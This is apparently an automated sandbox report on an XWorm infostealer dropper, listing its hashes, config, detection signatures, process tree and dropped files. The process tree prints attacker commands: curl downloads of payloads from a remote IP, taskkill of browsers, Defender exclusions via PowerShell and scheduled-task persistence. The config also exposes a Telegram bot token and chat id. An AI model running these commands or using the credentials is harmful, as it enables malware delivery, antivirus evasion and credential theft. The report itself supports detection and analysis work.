Analysis
-
max time kernel
133s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 21:34
Static task
static1
Behavioral task
behavioral1
Sample
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe
Resource
win7-20240508-en
General
-
Target
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe
-
Size
87KB
-
MD5
ab378d6539627c52dbfc272c83eb420c
-
SHA1
039060f0fdefbe0a62147a7bbad9b1a526a78d61
-
SHA256
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
-
SHA512
afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
-
SSDEEP
1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
winlogon.exe
-
pastebin_url
https://pastebin.com/raw/kTrgfRNT
-
telegram
https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235
Signatures
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\rm.exe family_xworm behavioral2/memory/4084-25-0x0000000000A00000-0x0000000000A16000-memory.dmp family_xworm C:\Users\Admin\AppData\Local\Temp\wlms.exe family_xworm behavioral2/memory/3112-29-0x0000000000B00000-0x0000000000B16000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3600 powershell.exe 1144 powershell.exe 4716 powershell.exe 2984 powershell.exe 2492 powershell.exe 1472 powershell.exe 1408 powershell.exe 4500 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exegrabber.exerm.exewlms.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation grabber.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation rm.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation wlms.exe -
Executes dropped EXE 8 IoCs
Processes:
grabber.exeram.exerm.exewlms.exewlms.exewinlogon.exewlms.exewinlogon.exepid process 4964 grabber.exe 1300 ram.exe 4084 rm.exe 3112 wlms.exe 2484 wlms.exe 4352 winlogon.exe 1752 wlms.exe 468 winlogon.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
rm.exewlms.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "C:\\ProgramData\\winlogon.exe" rm.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wlms = "C:\\Users\\Admin\\AppData\\Roaming\\wlms.exe" wlms.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4752 schtasks.exe 4368 schtasks.exe -
Kills process with taskkill 15 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1228 taskkill.exe 4500 taskkill.exe 2184 taskkill.exe 3636 taskkill.exe 1852 taskkill.exe 1376 taskkill.exe 468 taskkill.exe 1380 taskkill.exe 2576 taskkill.exe 1864 taskkill.exe 2356 taskkill.exe 4660 taskkill.exe 1680 taskkill.exe 4428 taskkill.exe 2124 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewlms.exerm.exepid process 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 1472 powershell.exe 1472 powershell.exe 1472 powershell.exe 1408 powershell.exe 1408 powershell.exe 4500 powershell.exe 4500 powershell.exe 4500 powershell.exe 1408 powershell.exe 3600 powershell.exe 3600 powershell.exe 1144 powershell.exe 1144 powershell.exe 3600 powershell.exe 1144 powershell.exe 4716 powershell.exe 4716 powershell.exe 2984 powershell.exe 2984 powershell.exe 4716 powershell.exe 2984 powershell.exe 3112 wlms.exe 4084 rm.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exerm.exewlms.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinlogon.exewlms.exewinlogon.exewlms.exedescription pid process Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 1380 taskkill.exe Token: SeDebugPrivilege 4428 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2124 taskkill.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 4500 taskkill.exe Token: SeDebugPrivilege 2184 taskkill.exe Token: SeDebugPrivilege 2356 taskkill.exe Token: SeDebugPrivilege 1864 taskkill.exe Token: SeDebugPrivilege 3636 taskkill.exe Token: SeDebugPrivilege 1228 taskkill.exe Token: SeDebugPrivilege 1376 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 468 taskkill.exe Token: SeDebugPrivilege 4084 rm.exe Token: SeDebugPrivilege 3112 wlms.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 4500 powershell.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeDebugPrivilege 1144 powershell.exe Token: SeDebugPrivilege 4716 powershell.exe Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 4084 rm.exe Token: SeDebugPrivilege 4352 winlogon.exe Token: SeDebugPrivilege 2484 wlms.exe Token: SeDebugPrivilege 468 winlogon.exe Token: SeDebugPrivilege 1752 wlms.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
wlms.exerm.exepid process 3112 wlms.exe 4084 rm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.execmd.exegrabber.execmd.exeram.exerm.exewlms.exedescription pid process target process PID 2672 wrote to memory of 3156 2672 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe cmd.exe PID 2672 wrote to memory of 3156 2672 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe cmd.exe PID 3156 wrote to memory of 4000 3156 cmd.exe curl.exe PID 3156 wrote to memory of 4000 3156 cmd.exe curl.exe PID 3156 wrote to memory of 4656 3156 cmd.exe curl.exe PID 3156 wrote to memory of 4656 3156 cmd.exe curl.exe PID 3156 wrote to memory of 4964 3156 cmd.exe grabber.exe PID 3156 wrote to memory of 4964 3156 cmd.exe grabber.exe PID 4964 wrote to memory of 4704 4964 grabber.exe cmd.exe PID 4964 wrote to memory of 4704 4964 grabber.exe cmd.exe PID 4704 wrote to memory of 4024 4704 cmd.exe curl.exe PID 4704 wrote to memory of 4024 4704 cmd.exe curl.exe PID 4704 wrote to memory of 4368 4704 cmd.exe curl.exe PID 4704 wrote to memory of 4368 4704 cmd.exe curl.exe PID 4704 wrote to memory of 1300 4704 cmd.exe ram.exe PID 4704 wrote to memory of 1300 4704 cmd.exe ram.exe PID 1300 wrote to memory of 1680 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1680 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1380 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1380 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4428 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4428 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2576 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2576 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2124 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2124 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1852 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1852 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4500 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4500 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2184 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2184 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2356 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 2356 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1864 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1864 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 3636 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 3636 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1228 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1228 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1376 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 1376 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4660 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 4660 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 468 1300 ram.exe taskkill.exe PID 1300 wrote to memory of 468 1300 ram.exe taskkill.exe PID 4704 wrote to memory of 4084 4704 cmd.exe rm.exe PID 4704 wrote to memory of 4084 4704 cmd.exe rm.exe PID 3156 wrote to memory of 3112 3156 cmd.exe wlms.exe PID 3156 wrote to memory of 3112 3156 cmd.exe wlms.exe PID 4084 wrote to memory of 1472 4084 rm.exe powershell.exe PID 4084 wrote to memory of 1472 4084 rm.exe powershell.exe PID 3112 wrote to memory of 2492 3112 wlms.exe powershell.exe PID 3112 wrote to memory of 2492 3112 wlms.exe powershell.exe PID 4084 wrote to memory of 4500 4084 rm.exe powershell.exe PID 4084 wrote to memory of 4500 4084 rm.exe powershell.exe PID 3112 wrote to memory of 1408 3112 wlms.exe powershell.exe PID 3112 wrote to memory of 1408 3112 wlms.exe powershell.exe PID 4084 wrote to memory of 3600 4084 rm.exe powershell.exe PID 4084 wrote to memory of 3600 4084 rm.exe powershell.exe PID 3112 wrote to memory of 1144 3112 wlms.exe powershell.exe PID 3112 wrote to memory of 1144 3112 wlms.exe powershell.exe PID 4084 wrote to memory of 4716 4084 rm.exe powershell.exe PID 4084 wrote to memory of 4716 4084 rm.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe"C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49CC.bat C:\Users\Admin\AppData\Local\Temp\2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\system32\curl.execurl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"3⤵PID:4000
-
C:\Windows\system32\curl.execurl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"3⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\grabber.exegrabber.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\513D.tmp\513E.tmp\513F.bat C:\Users\Admin\AppData\Local\Temp\grabber.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\curl.execurl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe5⤵PID:4024
-
C:\Windows\system32\curl.execurl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe5⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\ram.exeram.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4428 -
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576 -
C:\Windows\system32\taskkill.exetaskkill /F /IM kometa.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\system32\taskkill.exetaskkill /F /IM orbitum.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\system32\taskkill.exetaskkill /F /IM centbrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\system32\taskkill.exetaskkill /F /IM 7star.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184 -
C:\Windows\system32\taskkill.exetaskkill /F /IM sputnik.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2356 -
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\system32\taskkill.exetaskkill /F /IM epicprivacybrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1228 -
C:\Windows\system32\taskkill.exetaskkill /F /IM uran.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4660 -
C:\Windows\system32\taskkill.exetaskkill /F /IM iridium.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:468 -
C:\Users\Admin\AppData\Local\Temp\rm.exerm.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"6⤵
- Creates scheduled task(s)
PID:4752 -
C:\Users\Admin\AppData\Local\Temp\wlms.exewlms.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wlms" /tr "C:\Users\Admin\AppData\Roaming\wlms.exe"4⤵
- Creates scheduled task(s)
PID:4368
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4352
-
C:\Users\Admin\AppData\Roaming\wlms.exeC:\Users\Admin\AppData\Roaming\wlms.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:468
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wlms.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD510fb30dc297f99d6ebafa5fee8b24fa2
SHA176904509313a49a765edcde26b69c3a61f9fa225
SHA256567bcacac120711fc04bf8e6c8cd0bff7b61e8ee0a6316254d1005ebb1264e6a
SHA512c42ace1ea0923fa55592f4f486a508ea56997fdbe0200016b0fc16a33452fc28e4530129a315b3b3a5ede37a07097c13a0eb310c9e91e5d97bb7ce7b955b9498
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD57ce292bb581460978c5b6a6b6c02ea99
SHA1261d81777c16ad7a104052a3b9d719c26f55ba38
SHA256e7fcfed5376d00e784f09167de08f1559ae2ffc5a3b3e49c10af538153d7f806
SHA512af498881c99b46d2a0c6b42d6c96fcc405f220189843d9a4bf0cad6fcdcab29c330322041c96571fb4119fd548f0daaf2e06eabdcc844ab4f645022571116fff
-
C:\Users\Admin\AppData\Local\Temp\49CA.tmp\49CB.tmp\49CC.batFilesize
202B
MD5040dc40ccd7346ace502b30584d4d5a0
SHA1886b8f5f079db8f5569235aa6dff74c1cf89942d
SHA256f209745a8497c9b93a16dda0bf627dc88662184b00658013fec202e129f64450
SHA5120319239eaebf27ff0f6c4be1b9f737da31d39faccbf47f6d0a0506d2771515928b38981d75365a0307defd530ff68b4de37d0af89519d052037782a741c7dc02
-
C:\Users\Admin\AppData\Local\Temp\513D.tmp\513E.tmp\513F.batFilesize
230B
MD5abdb6860d790577e02cca5005866bbe8
SHA16c87a9e8b0b29ffe358c079a54f06dd9ef5cfb37
SHA256ee13e97e15c3a2f432a7bfd3af278aa38ff88baa7652ea0bfb2e5d9bf5adb8f0
SHA5121bbcf1d4540019aa392234e91e7629fd9f61240b8d7003df3404536810e639f7019a60bb74c2a08be5f855fd96923d0f8e0cdf7fa3a3d25e1e5829487a959fce
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ct0s3akk.bvx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cards.jsonFilesize
4B
MD537a6259cc0c1dae299a7866489dff0bd
SHA12be88ca4242c76e8253ac62474851065032d6833
SHA25674234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
SHA51204f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
-
C:\Users\Admin\AppData\Local\Temp\grabber.exeFilesize
120KB
MD54e1e436848d533c9a00b762ac148786d
SHA142962a264fbdbc96eb8267052298be9143ecd8bf
SHA256efcd31afd704c03d8a487a06c795bba7ea0a1cde0866d8fcfd40f4c3ce197bbd
SHA51259d16efac5f0ea7c62d18ef30032eba907b8d6c097463a8244f3d709c85b90ec12387c94a4d8a35dfb59d0cbd2dc02d0b39a1f6bd12c5ccd050d552070fdf30d
-
C:\Users\Admin\AppData\Local\Temp\ram.exeFilesize
7.6MB
MD52c93399e0b0fc11cd03a56fc844a4816
SHA1d8a6db37b1ac3cc819b04b0f4aac7fe721f88f00
SHA256081da8d5b9e21e11ae3aeafd4ac54ba2e7a45a05abb08139bc1aa0213f1ef155
SHA512dea99c0a22077389f6f6662e644e47ecb55ac010881b135ada2e07ac7a5ba1d42670d52c6cd88804aa3a16783f1e1f39b23fe3f7de6030ede831a27fee30f4a8
-
C:\Users\Admin\AppData\Local\Temp\rm.exeFilesize
64KB
MD5a43a55c5578f61d05ce146ead83e745a
SHA183093f791120d3e74b0d0847aebc52d3c9f04078
SHA256de4d28dd8c9208fe86dec1e014913f3cfefdcadf73a7adb6eb062677f5f5772f
SHA512a49839e60d77003090e0c9f602a64e597648e7151d99c5096479984cee32d376c8bd425114704b9366d213d0e9494900a726dead28e0548c5b7788ad5e5cbf1d
-
C:\Users\Admin\AppData\Local\Temp\wlms.exeFilesize
63KB
MD574820650cbe9027cbd4766d9ef53af42
SHA1d97e675f6526f38ac2b7b7fe720dda538217f3a3
SHA256552b0815f8d176917fa1d0006b72079be0ee1aa2ba7adceffb97f6dd963fb142
SHA51228a34dbe459e21fd01fff30dcc63f2d3c9083ffd04f221aeba9de3401b24b90f6af90bf8929a6ad186d856051bf5d87053e0c1ee8ebc03e752ff3e59ee639f3c
-
memory/1300-21-0x00007FF7211E0000-0x00007FF721A13000-memory.dmpFilesize
8.2MB
-
memory/2492-35-0x00000275D5BF0000-0x00000275D5C12000-memory.dmpFilesize
136KB
-
memory/3112-29-0x0000000000B00000-0x0000000000B16000-memory.dmpFilesize
88KB
-
memory/4084-25-0x0000000000A00000-0x0000000000A16000-memory.dmpFilesize
88KB